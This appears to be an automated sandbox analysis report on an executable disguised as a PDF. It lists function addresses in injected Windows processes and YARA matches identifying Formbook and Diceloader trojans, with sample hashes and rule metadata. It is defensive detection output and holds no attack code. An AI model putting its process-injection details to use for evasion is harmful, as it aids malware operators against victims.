Source: C:\Windows\explorer.exe	Code function: 7_2_1016CB30	7_2_1016CB30
Source: C:\Windows\explorer.exe	Code function: 7_2_106EB036	7_2_106EB036
Source: C:\Windows\explorer.exe	Code function: 7_2_106E2082	7_2_106E2082
Source: C:\Windows\explorer.exe	Code function: 7_2_106E3D02	7_2_106E3D02
Source: C:\Windows\explorer.exe	Code function: 7_2_106E9912	7_2_106E9912
Source: C:\Windows\explorer.exe	Code function: 7_2_106EF5CD	7_2_106EF5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_106EC232	7_2_106EC232
Source: C:\Windows\explorer.exe	Code function: 7_2_106E6B32	7_2_106E6B32
Source: C:\Windows\explorer.exe	Code function: 7_2_106E6B30	7_2_106E6B30
Source: C:\Windows\explorer.exe	Code function: 7_2_1124C232	7_2_1124C232
Source: C:\Windows\explorer.exe	Code function: 7_2_11246B30	7_2_11246B30
Source: C:\Windows\explorer.exe	Code function: 7_2_11246B32	7_2_11246B32
Source: C:\Windows\explorer.exe	Code function: 7_2_11243D02	7_2_11243D02
Source: C:\Windows\explorer.exe	Code function: 7_2_11249912	7_2_11249912
Source: C:\Windows\explorer.exe	Code function: 7_2_1124F5CD	7_2_1124F5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_1124B036	7_2_1124B036
Source: C:\Windows\explorer.exe	Code function: 7_2_11242082	7_2_11242082
Source: C:\Windows\explorer.exe	Code function: 7_2_112E5D02	7_2_112E5D02
Source: C:\Windows\explorer.exe	Code function: 7_2_112EB912	7_2_112EB912
Source: C:\Windows\explorer.exe	Code function: 7_2_112F15CD	7_2_112F15CD
Source: C:\Windows\explorer.exe	Code function: 7_2_112ED036	7_2_112ED036
Source: C:\Windows\explorer.exe	Code function: 7_2_112E4082	7_2_112E4082
Source: C:\Windows\explorer.exe	Code function: 7_2_112E8B32	7_2_112E8B32
Source: C:\Windows\explorer.exe	Code function: 7_2_112E8B30	7_2_112E8B30
Source: C:\Windows\explorer.exe	Code function: 7_2_112EE232	7_2_112EE232
Source: C:\Windows\explorer.exe	Code function: 7_2_11445D02	7_2_11445D02
Source: C:\Windows\explorer.exe	Code function: 7_2_1144B912	7_2_1144B912
Source: C:\Windows\explorer.exe	Code function: 7_2_114515CD	7_2_114515CD
Source: C:\Windows\explorer.exe	Code function: 7_2_1144D036	7_2_1144D036
Source: C:\Windows\explorer.exe	Code function: 7_2_11444082	7_2_11444082
Source: C:\Windows\explorer.exe	Code function: 7_2_11448B30	7_2_11448B30
Source: C:\Windows\explorer.exe	Code function: 7_2_11448B32	7_2_11448B32
Source: C:\Windows\explorer.exe	Code function: 7_2_1144E232	7_2_1144E232
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE39FE	9_2_00DE39FE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035BD34C	9_2_035BD34C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368A352	9_2_0368A352
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368132D	9_2_0368132D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036903E6	9_2_036903E6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DE3F0	9_2_035DE3F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0361739A	9_2_0361739A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03670274	9_2_03670274
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036712ED	9_2_036712ED
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EB2C0	9_2_035EB2C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036502C0	9_2_036502C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D52A0	9_2_035D52A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0369B16B	9_2_0369B16B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0360516C	9_2_0360516C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035BF172	9_2_035BF172
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03658158	9_2_03658158
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C0100	9_2_035C0100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366A118	9_2_0366A118
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036881CC	9_2_036881CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036901AA	9_2_036901AA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DB1B0	9_2_035DB1B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036870E9	9_2_036870E9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F0E0	9_2_0368F0E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D70C0	9_2_035D70C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367F0CC	9_2_0367F0CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035F4750	9_2_035F4750
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0770	9_2_035D0770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CC7C0	9_2_035CC7C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F7B0	9_2_0368F7B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036816CC	9_2_036816CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EC6E0	9_2_035EC6E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687571	9_2_03687571
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0535	9_2_035D0535
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366D5B0	9_2_0366D5B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03690591	9_2_03690591
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03682446	9_2_03682446
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C1460	9_2_035C1460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F43F	9_2_0368F43F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367E4F6	9_2_0367E4F6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FB76	9_2_0368FB76
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368AB40	9_2_0368AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03645BF0	9_2_03645BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0360DBF9	9_2_0360DBF9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03686BD7	9_2_03686BD7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EFB80	9_2_035EFB80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03643A6C	9_2_03643A6C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FA49	9_2_0368FA49
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687A46	9_2_03687A46
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367DAC6	9_2_0367DAC6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03615AA0	9_2_03615AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366DAAC	9_2_0366DAAC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CEA80	9_2_035CEA80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D9950	9_2_035D9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EB950	9_2_035EB950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E6962	9_2_035E6962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0369A9A6	9_2_0369A9A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D29A0	9_2_035D29A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D2840	9_2_035D2840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DA840	9_2_035DA840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0363D800	9_2_0363D800
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035FE8F0	9_2_035FE8F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D38E0	9_2_035D38E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035B68B8	9_2_035B68B8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03644F40	9_2_03644F40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03612F28	9_2_03612F28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FF09	9_2_0368FF09
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035F0F30	9_2_035F0F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C2FC8	9_2_035C2FC8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DCFE0	9_2_035DCFE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0364EFA0	9_2_0364EFA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D1F92	9_2_035D1F92
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FFB1	9_2_0368FFB1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0E59	9_2_035D0E59
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368EE26	9_2_0368EE26
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368EEDB	9_2_0368EEDB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E2E90	9_2_035E2E90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D9EB0	9_2_035D9EB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368CE93	9_2_0368CE93
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687D73	9_2_03687D73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D3D40	9_2_035D3D40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03681D5A	9_2_03681D5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DAD00	9_2_035DAD00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EFDC0	9_2_035EFDC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CADE0	9_2_035CADE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E8DBF	9_2_035E8DBF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03649C32	9_2_03649C32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0C00	9_2_035D0C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FCF2	9_2_0368FCF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C0CF2	9_2_035C0CF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03670CB5	9_2_03670CB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5E5DE	9_2_00C5E5DE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C42D90	9_2_00C42D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5DD0E	9_2_00C5DD0E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5D6C0	9_2_00C5D6C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C49E5D	9_2_00C49E5D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C49E60	9_2_00C49E60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C42FB0	9_2_00C42FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A036	9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03985B30	9_2_03985B30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03985B32	9_2_03985B32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398B232	9_2_0398B232
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03988912	9_2_03988912
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03981082	9_2_03981082
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398E5CD	9_2_0398E5CD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03982D02	9_2_03982D02

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: String function: 00007FF7D785C9D0 appears 63 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03617E54 appears 96 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 035BB970 appears 268 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0364F290 appears 105 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03605130 appears 36 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0363EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059B7E54 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059EF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 0595B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059DEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059A5130 appears 36 times

Source: 101 2043 5770 pdf.exe

Static PE information: invalid certificate

Source: 101 2043 5770 pdf.exe	Binary or memory string: OriginalFilename vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2294564092.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.E1 vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000000.2321404390.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2346157181.000001EC01830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe.0.dr	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe

Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
